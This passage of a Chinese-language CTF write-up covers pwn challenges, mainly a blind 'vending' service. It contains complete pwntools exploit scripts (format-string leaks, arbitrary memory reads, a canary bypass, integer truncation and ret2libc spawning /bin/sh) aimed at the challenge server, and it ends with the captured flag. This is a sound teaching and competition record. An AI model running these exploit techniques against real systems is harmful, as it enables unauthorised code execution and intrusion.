        from pwn import *\n\ncontext(arch=\"i386\", os=\"linux\")\n\nHOST = \"39.96.193.120\"\nPORT = 10000\n\nwrite_plt  = 0x08049080\nread_plt   = 0x08049040\nread_got   = 0x0804c00c\ntarget_val = 0x0804c030\npop3_ret   = 0x08049381\n\nsystem_off = 0x041360\nbinsh_off  = 0x18c363\nlsm_ret1   = 0x01ae64\nlsm_ret2   = 0x01aed5\n\np = remote(HOST, PORT)\n\np.recvuntil(b\"everything.n\")\np.recvuntil(b\"here.n\")\n\nfmt_payload = p32(target_val) + b\"%1c%4$hhn|%15$p|\"\nfmt_payload = fmt_payload.ljust(0x20, b\"x00\")\np.send(fmt_payload)\n\nresp = p.recvuntil(b\"Input:n\")\nlog.info(f\"resp = {resp}\")\n\nleak_str = resp.split(b\"|\")[1]\nleak_val = int(leak_str, 16)\nlog.success(f\"leak = {hex(leak_val)}\")\n\nlast12 = leak_val & 0xfff\nif last12 == (lsm_ret1 & 0xfff):\n    libc_base = leak_val - lsm_ret1\nelif last12 == (lsm_ret2 & 0xfff):\n    libc_base = leak_val - lsm_ret2\nelse:\n    log.warning(f\"unknown last12 = {hex(last12)}, trying write-based leak fallback\")\n    libc_base = leak_val - lsm_ret2\n\nsystem_addr = libc_base + system_off\nbinsh_addr  = libc_base + binsh_off\nlog.success(f\"libc_base = {hex(libc_base)}\")\nlog.success(f\"system    = {hex(system_addr)}\")\nlog.success(f\"\/bin\/sh   = {hex(binsh_addr)}\")\n\npad = b\"A\" * (0x90 + 4)\nrop  = p32(system_addr)\nrop += b\"BBBB\"\nrop += p32(binsh_addr)\npayload = pad + rop\npayload = payload.ljust(0x100, b\"x00\")\np.send(payload)\n\np.interactive()<\/code><\/pre>\n\n\n\n
        \"image-20260505120935148\"\/<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        vending<\/h3>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8fd9\u4e2a\u9898\u76ee\u975e\u5e38\u65e0\u8bed\uff0c\u4e8c\u8fdb\u5236\u9644\u4ef6\u548c\u8fdc\u7a0b\u9644\u4ef6\u4e0d\u4e00\u6837\uff1f \u6700\u5f00\u59cb\u662f\u4e24\u4e2a\u9644\u4ef6<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8fdc\u7a0b\u8fde\u63a5\u548c\u8fd0\u884c\u672c\u5730\u9644\u4ef6\u4e0d\u4e00\u6837<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u65e0\u8bdd\u53ef\u8bf4 \u7136\u540e\u5c31\u662f\u9ed1\u76d2\uff0c\u683c\u5f0f\u5316\u4e00\u6b65\u4e00\u6b65\u89e3\u7684\u76f2\u6253<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u73b0\u5728\u6539\u56de\u6765\u4e86\uff0c\u4f46\u662f\u6ca1\u6709so \u76f4\u63a5\u4e8c\u8fdb\u5236 \u771f\u65e0\u8bed\u4e86\u597d\u5417<\/p>\n\n\n\n
        \u6700\u5f00\u59cb\u7684\u89e3<\/h4>\n\n\n\n
        customer ID\u6ca1\u8fc7\u6ee4\u76f4\u63a5 printf(buf)<\/code>\uff0c\u88f8\u7684\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u3002<\/p>\n\n\n\n
        \u4e70\u4e1c\u897f\u7684\u6570\u91cf\u53ea cmp al, 3\u67e5\u4e86\u4f4e 8 \u4f4d\uff0c\u4f46\u540e\u9762\u771f\u8c03\u7528 read<\/code> \u7684\u65f6\u5019\u7528\u7684\u5374\u662f\u5b8c\u6574\u7684 32 \u4f4d eax<\/code>\u3002<\/p>\n\n\n\n
        \u7136\u540e\u5c31\u662f<\/p>\n\n\n\n
        \u7b2c\u4e00\u8f6e\uff1a\u8f93\u5165 %45$p \u628a canary \u638f\u51fa\u6765\u3002  \n\u7b2c\u4e8c\u8f6e\uff1a\u6784\u9020 %10$.6s \u505a\u4efb\u610f\u5730\u5740\u8bfb\uff0c\u53bb\u8bfb .data \u91cc\u7684 _IO_2_1_stdout_ \u6307\u9488\uff0c\u7b97 libc \u57fa\u5740\u3002  \n\u7b2c\u4e09\u8f6e\uff1a\u6570\u91cf\u76f4\u63a5\u586b 512\uff0c\u5341\u516d\u8fdb\u5236 0x200 \u7684\u4f4e\u4f4d\u662f 0\uff0c\u5b8c\u7f8e\u7ed5\u8fc7 <= 3 \u7684\u68c0\u67e5\uff0c\u540c\u65f6\u62ff\u5230 512 \u5b57\u8282\u7684\u5927\u6ea2\u51fa\u3002\u586b\u5145 0x108 \u5b57\u8282\u5783\u573e\u6570\u636e\u8865\u4e0a canary\uff0c\u6700\u540e\u63a5 pop rdi \u548c system \u7684\u5730\u5740\u76f4\u63a5\u4e00\u628a\u68ad\u3002<\/code><\/pre>\n\n\n\n
        \u8fdc\u7a0b\u770b\u770b<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u5f97\u5230\u7684\u8fdc\u7a0b\u884c\u4e3a\u662f<\/p>\n\n\n\n
        \u6bcf\u8f6e\u4f1a\u95ee\u4e00\u6b21 customer ID\u518d\u95ee\u4e00\u6b21 quantity\u5982\u679c\u6570\u91cf\u68c0\u67e5\u901a\u8fc7\uff0c\u518d\u8ba9\u4f60\u8f93\u5165 product\u6bcf\u8f6e\u7ed3\u675f\u540e\u91cd\u65b0\u56de\u5230 customer ID<\/code><\/pre>\n\n\n\n
        \u7ed9\u7684attachment-16.6 \u8fd9\u4efd libc \u6700\u540e\u548c\u8fdc\u7a0b\u662f\u5bf9\u4e0a\u7684\uff0c\u80fd\u7528\u4e8e\u7b97\u7b26\u53f7\u504f\u79fb<\/p>\n\n\n\n
        \u5728 customer ID<\/code> \u8f93\u5165\uff1a<\/p>\n\n\n\n
        %p.%p.%p<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u8fd9\u8bf4\u660e customer ID<\/code> \u88ab\u76f4\u63a5\u62ff\u53bb\u505a printf(buf)<\/code> \u4e00\u7c7b\u64cd\u4f5c\u4e86\uff0c\u4e0d\u662f\u5355\u7eaf %s<\/code> \u6253\u5370\u3002\u786e\u8ba4\u53c2\u6570\u4f4d\u7f6e\uff0c\u53c8\u7ee7\u7eed\u679a\u4e3e<\/p>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        from pwn import *\n\ncontext.log_level = 'error'\n\nHOST = \"39.96.193.120\"\nPORT = 33334\n\nfor i in range(1, 80):\n    try:\n        io = remote(HOST, PORT, timeout=2)\n        io.recvuntil(b\"Please enter your customer ID:n\")\n\n        payload = f\"%{i}$p\".encode()\n        io.sendline(payload)\n\n        io.recvuntil(b\"Welcome, \")\n        leak = io.recvuntil(b\"nThe item\", drop=True).decode().strip()\n\n        print(f\"%{i}$p -> {leak}\")\n        io.close()\n    except Exception:\n        pass<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        %1$p -> 0x7ffd7317b820\n%4$p -> 0x9\n%5$p -> 0x9\n%8$p -> 0xa70243825<\/code><\/pre>\n\n\n\n
        \u540e\u9762\u53c8\u679a\u4e3e\u66f4\u6df1\u7684\u53c2\u6570\u4f4d\uff0c\u53d1\u73b0\uff1a<\/p>\n\n\n\n
        %45$p -> 0xa77868f809ccec00   \u8fd9\u7c7b\u4ee5 00 \u7ed3\u5c3e\u7684\u968f\u673a\u503c\n%47$p -> 0x40141a            \u7a33\u5b9a\u4ee3\u7801\u5730\u5740\n%51$p -> 0x7f...7083         libc \u5730\u5740\n%52$p -> 0x7f...6620         libc \u5730\u5740\n%55$p -> 0x4013e2            \u7a33\u5b9a\u4ee3\u7801\u5730\u5740\n%56$p -> 0x401440            \u7a33\u5b9a\u4ee3\u7801\u5730\u5740\n%58$p -> 0x401130            \u7a33\u5b9a\u4ee3\u7801\u5730\u5740\n%73$p -> 0x401130            \u7a33\u5b9a\u4ee3\u7801\u5730\u5740\n%77$p -> 0x40115e            \u7a33\u5b9a\u4ee3\u7801\u5730\u5740<\/code><\/pre>\n\n\n\n
        \u4ece\u8fd9\u4e00\u6b65\u5df2\u7ecf\u80fd\u77e5\u9053\uff1a<\/p>\n\n\n\n
        \u6808\u4e0a\u80fd\u76f4\u63a5\u6cc4\u9732\u51fa\u4ee3\u7801\u5730\u5740\u548c libc \u5730\u5740\uff0c\u6709\u7a33\u5b9a\u7684 canary \u5019\u9009\u503c\uff0c\u8fd9\u662f\u4e00\u4e2a\u5f88\u5178\u578b\u7684\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u4fe1\u606f\u6cc4\u9732\u70b9<\/code><\/pre>\n\n\n\n
        \u8fdc\u7a0b\u91cc\u786e\u5b9e\u6709\u957f\u5ea6\u9650\u5236\uff0c\u4f46\u4e0d\u4e00\u5b9a\u771f\u662f 3\uff0c\u9898\u76ee\u63cf\u8ff0\u8bf4\u201c\u6709\u9650\u8f93\u5165\u5185\u4e70\u5230\u60f3\u8981\u7684\u7269\u54c1\u201d\uff0c\u5f88\u50cf\u540e\u7eed\u4ea7\u54c1\u540d\u8f93\u5165\u957f\u5ea6\u4f1a\u88ab\u6570\u91cf\u9650\u5236\u3002\u9ed1\u76d2\u4e0a\u770b\u4e5f\u662f\u8fd9\u6837\uff1a<\/p>\n\n\n\n
        qty=1 \u65f6\u4f1a\u8bfb 1 \u5b57\u8282\u4ea7\u54c1\u540d\nqty=3\u65f6\u4f1a\u8bfb 3 \u5b57\u8282\u4ea7\u54c1\u540d\nqty=4 \u65f6\u770b\u8d77\u6765\u88ab\u9650\u5236\u4f4f<\/code><\/pre>\n\n\n\n
        \u628a\u903b\u8f91\u62a0\u51fa\u6765\u3002\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u505a\u8fdc\u7a0b\u5185\u5b58\u8bfb\u53d6,\u4e3a\u4ec0\u4e48\u80fd\u505a\u4efb\u610f\u5730\u5740\u8bfb\uff0c\u524d\u9762\u5df2\u7ecf\u77e5\u9053 customer ID<\/code> \u662f\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u3002\uff0c\u7ee7\u7eed\u6d4b\u53c2\u6570\u4f4d\u7f6e\u65f6\u53d1\u73b0\uff1a\u4ece\u6bd4\u8f83\u9760\u540e\u7684\u53c2\u6570\u5f00\u59cb\uff0cprintf<\/code> \u5df2\u7ecf\u5728\u6d88\u8d39\u6211\u4eec\u81ea\u5df1\u8f93\u5165\u7f13\u51b2\u533a\u91cc\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n
        \u53ef\u4ee5\u628a payload \u5e03\u7f6e\u6210\uff1a<\/p>\n\n\n\n
        fmt = b\"%10$.6s\"\npayload = fmt + b\"x00\" + b\"A\" * (16 - len(fmt) - 1) + p64(target_addr)<\/code><\/pre>\n\n\n\n
        \u8fd9\u6837\u7b2c 10 \u4e2a\u53c2\u6570\u5c31\u662f target_addr<\/code>\uff0c%10$.6s<\/code> \u5c31\u4f1a\u628a\u8fd9\u4e2a\u5730\u5740\u5f53\u6210\u5b57\u7b26\u4e32\u6307\u9488\u89e3\u5f15\u7528\uff0c\u5b8c\u6210\u4efb\u610f\u5730\u5740\u8bfb\u3002\u5148\u9a8c\u8bc1\u8fdc\u7a0b\u57fa\u5740\uff0c\u5148\u8bfb\u8fdc\u7a0b ELF \u5934\uff1a<\/p>\n\n\n\n
        addr = 0x400000\nleak = b'x7fELFx02x01x01'<\/code><\/pre>\n\n\n\n
        \u518d\u8bfb .text<\/code> \u8d77\u59cb\uff1a<\/p>\n\n\n\n
        addr = 0x401000\nleak = b'xf3x0fx1exfaHx83xecx08...'<\/code><\/pre>\n\n\n\n
        \u8fd9\u8bf4\u660e\uff1a\u8fdc\u7a0b ELF \u57fa\u5740\u56fa\u5b9a\u662f 0x400000<\/code>\uff0c\u4e0d\u662f PIE,\u8fd9\u5bf9\u540e\u9762\u6784\u9020 ROP \u6709\u7528\uff0c\u56e0\u4e3a\u7a0b\u5e8f\u5185 gadget \u5730\u5740\u90fd\u662f\u56fa\u5b9a\u7684\uff0c\u628a .text<\/code> \u6bb5 dump \u4e0b\u6765\uff0c\u628a 0x401100-0x401520<\/code> \u8fd9\u4e00\u6bb5\u8fdc\u7a0b .text<\/code> \u7528\u4e0a\u9762\u7684\u4efb\u610f\u5730\u5740\u8bfb\u65b9\u6cd5 dump \u4e86\u4e0b\u6765\uff0c\u7136\u540e\u672c\u5730\u53cd\u6c47\u7f16\u3002<\/p>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        from pwn import *\n\ncontext.log_level = 'error'\n\nstart_addr = 0x401100\nend_addr = 0x401520\ncurr = start_addr\ndumped = b\"\"\n\nwhile curr < end_addr:\n    try:\n        io = remote(\"39.96.193.120\", 33334, timeout=3)\n        io.recvuntil(b\"Please enter your customer ID:n\")\n\n        fmt = b\"%10$.6s\"\n        payload = fmt + b\"x00\" + b\"A\" * (16 - len(fmt) - 1) + p64(curr)\n        io.send(payload)\n\n        data = io.recvuntil(b\"quantity you need:n\")\n        io.close()\n\n        leak = data.split(b\"Welcome, \")[1].split(b\"nThe item\")[0]\n\n        if len(leak) == 0:\n            dumped += b\"x00\"\n            curr += 1\n        else:\n            dumped += leak\n            curr += len(leak)\n\n        print(hex(curr))\n\n    except Exception:\n        pass\n\nwith open(\"text_dump.bin\", \"wb\") as f:\n    f.write(dumped)<\/code><\/pre>\n\n\n\n
        \u62ff\u5230\u7684\u4e3b\u8981\u6c47\u7f16\u5982\u4e0b\uff1a<\/p>\n\n\n\n
        0x4012ae: push rbp\n0x4012b6: sub  rsp, 0x140\n...\n0x4012cc: lea  rax, [rbp - 0x110]\n0x4012d3: mov  edx, 0x100\n0x4012e0: call 0x4010e0\n0x4012e5: lea  rax, [rbp - 0x130]\n0x4012ec: mov  edx, 0x20\n0x4012f9: call 0x4010e0\n...\n0x40130a: lea  rax, [rbp - 0x130]\n0x401311: mov  edx, 0x1f\n0x40131e: call 0x4010f0\n0x401323: lea  rdi, [rip + 0xd15]\n0x40132f: call 0x4010d0\n0x401334: lea  rax, [rbp - 0x130]\n0x401343: call 0x4010d0\n...\n0x401360: lea  rax, [rbp - 0x134]\n0x401367: mov  rsi, rax\n0x40136a: lea  rdi, [rip + 0xd2e]\n0x401376: call 0x401120\n0x40137b: call 0x401100\n0x401380: mov  eax, dword ptr [rbp - 0x134]\n0x401386: cmp  al, 3\n0x401388: jbe  0x401398\n0x40138a: lea  rdi, [rip + 0xd17]\n0x401391: call 0x4010b0\n...\n0x401398: lea  rdi, [rip + 0xd31]\n0x40139f: call 0x4010b0\n0x4013a4: mov  eax, dword ptr [rbp - 0x134]\n0x4013aa: mov  edx, eax\n0x4013ac: lea  rax, [rbp - 0x110]\n0x4013bb: call 0x4010f0\n0x4013c0: lea  rdi, [rip + 0xd38]\n0x4013c7: call 0x4010b0<\/code><\/pre>\n\n\n\n
        \u7136\u540e\u7ee7\u7eed\u770b main<\/code>\uff1a<\/p>\n\n\n\n
        0x4013fd: mov  eax, 0\n0x401402: call 0x401216\n0x401407: mov  dword ptr [rbp - 0xc], 0\n0x40140e: jmp  0x40141e\n0x401410: mov  eax, 0\n0x401415: call 0x4012ae\n0x40141a: add  dword ptr [rbp - 0xc], 1\n0x40141e: cmp  dword ptr [rbp - 0xc], 2\n0x401422: jle  0x401410<\/code><\/pre>\n\n\n\n
        \u8fd9\u8bf4\u660e buy<\/code> \u903b\u8f91\u603b\u5171\u4f1a\u8dd1\u4e09\u8f6e\uff0c\u670d\u52a1\u7aef\u903b\u8f91\u91cd\u5efa\uff0c\u7ed3\u5408\u6c47\u7f16\u548c\u5b9e\u9645\u56de\u663e\uff0c\u8fdc\u7a0b\u4e3b\u903b\u8f91\u53ef\u4ee5\u8fd8\u539f\u6210\u4e0b\u9762\u8fd9\u6837\uff0c\u8ba9Ai\u8fd8\u539f\u5c31\u884c\u4e86<\/p>\n\n\n\n
        void buy() {\n    char product[0x100];\n    char customer_id[0x20];\n    int qty;\n\n    memset(product, 0, 0x100);\n    memset(customer_id, 0, 0x20);\n\n    puts(\"Please enter your customer ID:\");\n    read(0, customer_id, 0x1f);\n\n    printf(\"Welcome, \");\n    printf(customer_id);   \/\/ \u683c\u5f0f\u5316\u5b57\u7b26\u4e32\n\n    puts(\"The item is limited to three per customer, please enter the quantity you need:\");\n    scanf(\"%d\", &qty);\n    getchar();\n\n    if ((unsigned char)qty > 3) {\n        puts(\"Exceeded the limit! Don't be greedy!\");\n        return;\n    }\n\n    puts(\"Please enter the name of the product you need:\");\n    read(0, product, qty); \/\/ \u7528\u7684\u662f\u5b8c\u6574 int\n    puts(\"Order confirmed!\");\n}\n\nint main() {\n    setup();\n    for (int i = 0; i <= 2; i++) {\n        buy();\n    }\n}<\/code><\/pre>\n\n\n\n
        \u8fd9\u91cc\u4e24\u4e2a\u6f0f\u6d1e\u975e\u5e38\u6e05\u695a\uff1a\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\uff0cprintf(customer_id)\u76f4\u63a5\u6210\u7acb\u3002<\/p>\n\n\n\n
        \u6808\u4fe1\u606f\u6cc4\u9732\ncanary \u6cc4\u9732\n\u7a0b\u5e8f\u5730\u5740\u6cc4\u9732\nlibc \u5730\u5740\u6cc4\u9732\n\u4efb\u610f\u5730\u5740\u8bfb<\/code><\/pre>\n\n\n\n
        \u6570\u91cf\u68c0\u67e5\u53ea\u6bd4\u8f83 al<\/code>\u4e3b\u8981\u7684\uff1a<\/p>\n\n\n\n
        0x401380: mov eax, dword ptr [rbp - 0x134]\n0x401386: cmp al, 3<\/code><\/pre>\n\n\n\n
        \u4e5f\u5c31\u662f\u8bf4\uff1a\u68c0\u67e5\u65f6\u53ea\u770b qty<\/code> \u7684\u4f4e 8 \u4f4d,\u4f46\u662f\u540e\u9762 read<\/code> \u957f\u5ea6\u65f6\uff1a<\/p>\n\n\n\n
        0x4013a4: mov eax, dword ptr [rbp - 0x134]\n0x4013aa: mov edx, eax<\/code><\/pre>\n\n\n\n
        \u8fd9\u91cc\u7528\u7684\u662f\u5b8c\u6574 32 \u4f4d\u6574\u6570\uff0c\u6240\u4ee5 qty = 512<\/code> \u65f6\uff1a<\/p>\n\n\n\n
        0x200 & 0xff = 0x00`\n0 <= 3`\uff0c\u68c0\u67e5\u901a\u8fc7\n\u771f\u6b63\u7684 read \u957f\u5ea6\u5374\u662f 512<\/code><\/pre>\n\n\n\n
        \u8fd9\u6b63\u597d\u5c31\u662f\u9898\u76ee\u8bf4\u7684\u201c\u6709\u9650\u8f93\u5165\u53ef\u4ee5\u7ed5\u8fc7\u201d\u7684\u5173\u952e\u70b9\uff0c\u540e\u9762\u6d4b\u8bd5\u6700\u7ec8\u5c31\u662f<\/p>\n\n\n\n
        \u7b2c\u4e00\u8f6e\u6cc4\u9732 canary\n\u7b2c\u4e8c\u8f6e\u6cc4\u9732 libc\n\u7b2c\u4e09\u8f6e\u5229\u7528 512 \u5b57\u8282\u8bfb\u957f\u6253 ret2libc<\/code><\/pre>\n\n\n\n
        \u6cc4\u9732 canary\uff0c\u627e canary \u53c2\u6570\u4f4d<\/strong><\/p>\n\n\n\n
        \u524d\u9762\u679a\u4e3e\u53c2\u6570\u4f4d\u65f6\uff0c%45$p<\/code> \u548c %49$p<\/code> \u90fd\u4f1a\u7ed9\u51fa\u540c\u4e00\u4e2a\u968f\u673a\u503c\uff0c\u800c\u4e14\u7a33\u5b9a\u4ee5 00<\/code> \u7ed3\u5c3e\uff0c\u4f8b\u5982\uff1a<\/p>\n\n\n\n
        0xa77868f809ccec00<\/code><\/pre>\n\n\n\n
        \u786e\u8ba4\u5b83\u771f\u7684\u662f canary\uff0c\u9a8c\u8bc1\uff1a<\/p>\n\n\n\n
        \u7b2c\u4e8c\u8f6e\u7528 qty=512\uff0c\u8986\u76d6\u5230 canary \u4f4d\u7f6e\uff0c\u628a %45$p \u6cc4\u9732\u51fa\u6765\u7684\u503c\u539f\u6837\u56de\u586b\uff0c\u53ea\u6539\u8fd4\u56de\u5730\u5740\uff0c\u4e0d\u4e71\u5199\u5176\u4ed6\u5173\u952e\u5b57\u6bb5\uff0c\u7ed3\u679c\u7a0b\u5e8f\u80fd\u6b63\u5e38\u7ee7\u7eed\u8dd1\uff0c\u8bf4\u660e\u8fd9\u4e2a\u503c\u786e\u5b9e\u662f canary\u3002<\/code><\/pre>\n\n\n\n
        \u504f\u79fb\u662f 0x108\uff0c\u6c47\u7f16\u91cc product<\/code> \u5728 [rbp-0x110]<\/code>\uff0ccanary \u5728 [rbp-0x8]<\/code>\uff0c\u6240\u4ee5\uff1a<\/p>\n\n\n\n
        0x110 - 0x8 = 0x108<\/code><\/pre>\n\n\n\n
        \u4e5f\u5c31\u662f\uff1a<\/p>\n\n\n\n
        0x108 \u5b57\u8282\u5230 canary\n\u518d 8 \u5b57\u8282\u662f saved rbp\n\u518d\u540e\u9762\u5c31\u662f\u8fd4\u56de\u5730\u5740<\/code><\/pre>\n\n\n\n
        \u6cc4\u9732 libc<\/strong>\u8fdc\u7a0b .data<\/code> \u533a\u91cc\u6709\u4e00\u4e2a\u5f88\u5408\u9002\u7684 libc \u6307\u9488\uff1a<\/p>\n\n\n\n
        0x404080 -> _IO_2_1_stdout_\n\n\u5b9e\u6d4b\u76f4\u63a5\u8bfb\u8fd9\u4e2a\u5730\u5740\uff0c\u5f97\u5230\uff1a\n0x7f5f64d336a0\n\n\u800c\u9644\u4ef6 libc \u91cc\uff1a\n_IO_2_1_stdout_ = 0x1ed6a0\n\n\u6240\u4ee5\uff1a\nlibc_base = 0x7f5f64d336a0 - 0x1ed6a0\n          = 0x7f5f64b46000\n\n\u7528\u683c\u5f0f\u4e32\u4efb\u610f\u5730\u5740\u8bfb payload\uff0c\u7528\u7684\u662f\uff1a\nfmt = b\"%10$.6s\"\npayload = fmt + b\"x00\" + b\"A\" * (16 - len(fmt) - 1) + p64(0x404080)<\/code><\/pre>\n\n\n\n
        \u56e0\u4e3a\uff1a<\/p>\n\n\n\n
        %10$.6s \u8868\u793a\u628a\u7b2c 10 \u4e2a\u53c2\u6570\u5f53\u6210\u6307\u9488\uff0c\u8bfb 6 \u5b57\u8282\u5b57\u7b26\u4e32\n\u4e4b\u6240\u4ee5\u662f 6 \u5b57\u8282\uff0c\u662f\u56e0\u4e3a amd64 \u7528\u6237\u6001\u5730\u5740\u9ad8\u4e24\u5b57\u8282\u901a\u5e38\u662f 0\uff0c\u8bfb 6 \u5b57\u8282\u8db3\u591f\n\u628a\u5730\u5740\u653e\u5728 payload \u540e\u90e8\uff0c\u5e76\u5bf9\u9f50\u5230\u683c\u5f0f\u4e32\u6d88\u8d39\u7684\u4f4d\u7f6e\uff0c\u5c31\u80fd\u5b8c\u6210\u4efb\u610f\u5730\u5740\u8bfb<\/code><\/pre>\n\n\n\n
        \u5229\u7528\u6574\u6570\u622a\u65ad\u653e\u5927\u8f93\u5165\u5e76 ret2libc\uff0c\u7ed5\u8fc7\u6570\u91cf\u9650\u5236\uff0c\u7b2c\u4e09\u8f6e\u6b63\u5e38\u8f93\u5165\uff1a<\/p>\n\n\n\n
        customer ID = pwn\nquantity    = 512<\/code><\/pre>\n\n\n\n
        512 \u80fd\u8fc7\uff1a<\/p>\n\n\n\n
        512 = 0x200\nlow byte = 0x00\n0x00 <= 3<\/code><\/pre>\n\n\n\n
        \u6240\u4ee5\u68c0\u67e5\u901a\u8fc7\uff0c\u4f46\u540e\u9762\u7684 read(0, product, qty)<\/code> \u4ecd\u7136\u4f1a\u6309 512 \u5b57\u8282\u8bfb\u53d6\u3002 \u4e3b\u7a0b\u5e8f\u91cc\u7684 gadget\uff0c\u4ece dump \u4e0b\u6765\u7684\u8fdc\u7a0b\u4ee3\u7801\u91cc\u641c\u7d22 gadget\uff0c\u62ff\u5230\uff1a<\/p>\n\n\n\n
        ret          = 0x401164\npop rdi; ret = 0x4014a3<\/code><\/pre>\n\n\n\n
        \u8fd9\u91cc\u7684 pop rdi; ret<\/code> \u521a\u597d\u80fd\u76f4\u63a5\u62ff\u6765\u505a ret2libc\uff0c libc \u91cc\u7684\u504f\u79fb\uff0c\u7528\u9644\u4ef6 src\/attachment-16.6<\/code>\uff1a<\/p>\n\n\n\n
        system  = 0x52290\n\"\/bin\/sh\" = 0x1b45bd<\/code><\/pre>\n\n\n\n
        \u6240\u4ee5\u5b8c\u6574 ROP \u94fe\uff1a<\/p>\n\n\n\n
        rop = flat(\n    b\"A\" * 0x108,\n    canary,\n    b\"B\" * 8,\n    0x401164,                    # ret\uff0c\u5bf9\u9f50\u6808\n    0x4014a3,                    # pop rdi; ret\n    libc_base + 0x1b45bd,        # \"\/bin\/sh\"\n    libc_base + 0x52290,         # system\n)<\/code><\/pre>\n\n\n\n
        \u6253 system(\"\/bin\/sh\")<\/code> \u4e0d\u6253 system(\"cat \/flag\")<\/code>\u56e0\u4e3a\u6211\u4eec\u53ea\u80fd\u63a7\u5236\u8fd4\u56de\u5730\u5740\u548c\u73b0\u6210\u5185\u5b58\uff0c\u4e0d\u592a\u65b9\u4fbf\u518d\u627e\u4e00\u4efd\u7a33\u5b9a\u7684 \"cat \/flag\"<\/code> \u5b57\u7b26\u4e32\uff0c\u800c \/bin\/sh<\/code> \u5728 libc \u91cc\u81ea\u5e26\u3002\u6240\u4ee5\u65b9\u5f0f\u662f\uff1a\uff0c\u5148 system(\"\/bin\/sh\")<\/code>\uff0c\u7136\u540e\u7ee7\u7eed\u5728 socket \u4e0a\u53d1\u547d\u4ee4\uff1a<\/p>\n\n\n\n
        cat \/flag 2>\/dev\/null; cat \/flag.txt 2>\/dev\/null; cat flag 2>\/dev\/null; cat flag.txt 2>\/dev\/null; exit<\/code><\/pre>\n\n\n\n
        \u53ef\u4ee5\u517c\u5bb9\u5e38\u89c1 flag \u8def\u5f84\u3002<\/p>\n\n\n\n
        exp.py<\/p>\n\n\n\n
        from pwn import *\nimport re\nimport time\n\ncontext.arch = \"amd64\"\ncontext.log_level = \"info\"\n\nHOST = \"39.96.193.120\"\nPORT = 33334\n\nOFFSET = 0x108\nRET = 0x401164\nPOP_RDI = 0x4014A3\nSTDOUT_PTR = 0x404080\n\nlibc = ELF(\".\/attachment-16.6\", checksec=False)\n\ndef connect():\n    last_error = None\n    for _ in range(6):\n        try:\n            return remote(HOST, PORT)\n        except Exception as exc:\n            last_error = exc\n            time.sleep(1)\n    raise last_error\n\ndef recv_menu(io):\n    data = b\"\"\n    while b\"Please enter your customer ID:\" not in data:\n        chunk = io.recv(timeout=3)\n        if not chunk:\n            raise EOFError(\"failed to receive menu banner\")\n        data += chunk\n    return data\n\ndef leak_canary(io):\n    io.sendline(b\"%45$p\")\n    data = io.recvuntil(b\"quantity you need:\")\n    match = re.search(rb\"Welcome, (0x[0-9a-fA-F]+)\", data)\n    if not match:\n        raise ValueError(f\"failed to parse canary leak: {data!r}\")\n    return int(match.group(1), 16)\n\ndef leak_memory(io, addr, size):\n    fmt = f\"%10$.{size}s\".encode()\n    if len(fmt) >= 16:\n        raise ValueError(\"format string is too long for the chosen layout\")\n\n    payload = fmt + b\"x00\" + b\"A\" * (16 - len(fmt) - 1) + p64(addr)\n    io.send(payload)\n    data = io.recvuntil(b\"quantity you need:\")\n    marker = b\"Welcome, \"\n    if marker not in data:\n        raise ValueError(f\"failed to parse arbitrary read output: {data!r}\")\n    return data.split(marker, 1)[1].split(b\"nThe item is limited\", 1)[0]\n\ndef skip_round(io):\n    io.sendline(b\"0\")\n    recv_menu(io)\n\ndef build_rop(canary, libc_base):\n    libc.address = libc_base\n    bin_sh = next(libc.search(b\"\/bin\/shx00\"))\n    return flat(\n        b\"A\" * OFFSET,\n        canary,\n        b\"B\" * 8,\n        RET,\n        POP_RDI,\n        bin_sh,\n        libc.sym[\"system\"],\n    )\n\ndef main():\n    io = connect()\n    recv_menu(io)\n\n    canary = leak_canary(io)\n    log.success(f\"canary = {canary:#x}\")\n    skip_round(io)\n\n    stdout_addr = u64(leak_memory(io, STDOUT_PTR, 6).ljust(8, b\"x00\"))\n    libc_base = stdout_addr - libc.sym[\"_IO_2_1_stdout_\"]\n    log.success(f\"_IO_2_1_stdout_ = {stdout_addr:#x}\")\n    log.success(f\"libc base = {libc_base:#x}\")\n    skip_round(io)\n\n    io.sendline(b\"pwn\")\n    io.recvuntil(b\"quantity you need:\")\n    io.sendline(b\"512\")\n    io.recvuntil(b\"Please enter the name of the product you need:\")\n\n    io.send(build_rop(canary, libc_base))\n    io.sendline(\n        b\"cat \/flag 2>\/dev\/null; \"\n        b\"cat \/flag.txt 2>\/dev\/null; \"\n        b\"cat flag 2>\/dev\/null; \"\n        b\"cat flag.txt 2>\/dev\/null; \"\n        b\"exit\"\n    )\n\n    data = io.recvrepeat(3)\n    io.close()\n\n    text = data.decode(\"latin1\", \"ignore\")\n    print(text, end=\"\")\n\n    match = re.search(r\"ISCC{[^}n]+}\", text)\n    if match:\n        log.success(f\"flag = {match.group(0)}\")\n    else:\n        log.warning(\"flag pattern not found in output\")\n\nif __name__ == \"__main__\":\n    main()\n<\/code><\/pre>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        ISCC{374ec3cd-aa7d-4c09-adab-4feb273ec0c1}<\/code><\/pre>\n\n\n\n
        \u6709\u4e8c\u8fdb\u5236\u9644\u4ef6\u7684\uff0c\u65e0so<\/h4>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \u6f0f\u6d1e\u5728vnln<\/p>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
        \"\"<\/div><\/figure>\n\n\n\n
